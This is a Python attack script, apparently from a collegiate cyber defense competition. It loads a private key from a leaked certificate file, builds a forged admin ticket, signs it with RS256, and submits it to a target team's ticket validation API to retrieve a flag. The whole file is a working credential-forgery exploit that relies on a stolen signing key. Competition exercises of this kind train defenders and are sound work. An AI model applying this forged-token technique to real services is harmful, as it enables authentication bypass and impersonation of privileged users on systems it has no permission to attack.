import json
import base64
import time
import requests
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.serialization import pkcs12

# Configuration
TEAM_NUMBER = input("Enter team being targeted: ")
#TICKETS_URL = "http://localhost:8081"
TICKETS_URL = f"http://tickets.team{TEAM_NUMBER}.isucdc.com:8080"
PFX_FILE = "leaked_cert.pfx"
PFX_PASSWORD = b"" # Empty as seen in compose.yml
KID = "410AB801244AA183A92ED4780AE92B00964EAA16"

def forge_ticket():
    print(f"[*] Loading private key from {PFX_FILE}...")
    try:
        with open(PFX_FILE, "rb") as f:
            pfx_data = f.read()
        
        private_key, certificate, additional_certs = pkcs12.load_key_and_certificates(pfx_data, PFX_PASSWORD)
    except Exception as e:
        print(f"[-] Error loading PFX: {e}")
        print("[!] Ensure you have run exploit_tickets_leak.py first and leaked_cert.pfx exists.")
        return

    # Construct payload
    # exp >= 2000000000 triggers the flag (roughly May 2033)
    now = int(time.time())
    payload_dict = {
        "iss": "ticket-signer",
        "sub": "forged-admin",
        "nbf": now - 60,
        "exp": 2000000001,
        "iat": now
    }
    
    # .NET JsonSerializer with default settings is fairly specific
    # The original code sorted keys: exp, iat, iss, nbf, sub
    sorted_payload = dict(sorted(payload_dict.items()))
    payload_json = json.dumps(sorted_payload, separators=(',', ':'))
    payload_bytes = payload_json.encode('utf-8')
    payload_b64 = base64.b64string = base64.b64encode(payload_bytes).decode('utf-8')

    print(f"[*] Signing payload: {payload_json}")
    
    # Sign the payload
    signature = private_key.sign(
        payload_bytes,
        padding.PKCS1v15(),
        hashes.SHA256()
    )
    signature_b64 = base64.b64encode(signature).decode('utf-8')

    # Construct the validation request
    request_body = {
        "payload": payload_b64,
        "signature": signature_b64,
        "alg": "RS256",
        "kid": KID
    }

    print("[*] Submitting forged ticket for validation...")
    response = requests.post(f"{TICKETS_URL}/api/tickets/validate", json=request_body)
    
    if response.status_code == 200:
        result = response.json()
        if result.get("valid"):
            print("[+] Success! Ticket validated.")
            print(f"[+] Server returned subject (Flag): {result.get('subject')}")
        else:
            print(f"[-] Validation failed: {result.get('reason')}")
    else:
        print(f"[-] Request failed with status: {response.status_code}")
        print(response.text)

if __name__ == "__main__":
    forge_ticket()
